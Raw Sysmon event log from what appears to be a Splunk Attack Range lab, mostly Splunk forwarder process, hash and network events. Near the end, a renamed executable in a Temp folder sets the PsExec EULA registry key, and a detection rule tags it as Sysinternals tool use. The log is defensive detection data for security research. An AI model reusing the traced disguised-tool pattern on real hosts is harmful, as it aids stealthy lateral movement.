23542300x8000000000000000296347Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:02.697{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E78D5653AD6CEF2246AF7A0AF98F2AE0,SHA256=ACB3166F140E2077C6CF6FFFBEFDA342ACEDCD964DC8675EB44C47D4C67F4B6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220418Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:02.212{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=493AC81E48B20C52B682D032973CF683,SHA256=5CA97F037D92D2C23C63EA78555031B880CDBE2F0A99A144254DC5EBB236090C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296346Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:02.629{C8EA50B7-1646-6216-F406-000000003802}69486776C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296345Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:02.180{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1646-6216-F406-000000003802}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296344Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:02.165{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296343Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:02.165{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296342Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:02.165{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296341Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:02.165{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296340Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:02.165{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1646-6216-F406-000000003802}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296339Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:02.163{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1646-6216-F406-000000003802}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296338Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:02.161{C8EA50B7-1646-6216-F406-000000003802}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000296337Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:59.615{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49334-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000296356Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:03.912{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1647-6216-F506-000000003802}6644C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296355Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:03.912{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296354Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:03.912{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296353Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:03.912{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296352Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:03.912{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296351Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:03.912{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1647-6216-F506-000000003802}6644C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296350Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:03.912{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1647-6216-F506-000000003802}6644C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296349Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:03.914{C8EA50B7-1647-6216-F506-000000003802}6644C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296348Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:03.712{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43127FBFCEB6A56F3A9A3984CC41A7C7,SHA256=3FEC48BB0979578D2B4A2B1EE1548301ECE8EE1A7CFA77A2299F3B83833B5556,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220419Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:03.430{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F3C5B3DA08EF487127A4BD5E8CEB43A,SHA256=6751CA52BFBD807627229AF5579D3A14F63F5F08802A2853DB44254822707D4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296357Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:04.726{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C255BACC06C9983EF10A5D6682C9E49,SHA256=E904F6A1FB8E3E84F3E15F8174D75CE440A04579D132C45304C44D4B4FDC22DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220420Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:04.602{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55CA50E1669B07B4F37A68D917AD3939,SHA256=60A4A28B646AD2FDF3C0BBCFA28CFE7DBCAF5C8F2A945F51BC0560879B6C522D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296377Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:05.827{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03CFBB52E0596BDDA84CBAE6995F18CE,SHA256=EEB0AC959352D7C85C03464F8114781D9F6A18861346BFA819A914734C36E353,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220421Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:05.743{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=354AF6627CC3E0B95B746C3415358290,SHA256=843BC0D3E8B0DF67FC1474FBABD6374A0E72CF3D94D8DA23FF5B1474D089AE82,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296376Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:05.709{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-1649-6216-F606-000000003802}6884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296375Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:05.709{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-1649-6216-F606-000000003802}6884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000296374Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:11:05.678{C8EA50B7-1649-6216-F606-000000003802}6884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000296373Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:05.563{C8EA50B7-F11F-6215-1000-000000003802}3646220C:\Windows\system32\svchost.exe{C8EA50B7-1649-6216-F706-000000003802}7112C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296372Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:05.563{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1649-6216-F706-000000003802}7112C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296371Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:05.541{C8EA50B7-1649-6216-F706-000000003802}71126112C:\Windows\system32\conhost.exe{C8EA50B7-1649-6216-F606-000000003802}6884C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296370Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:05.478{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1649-6216-F706-000000003802}7112C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296369Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 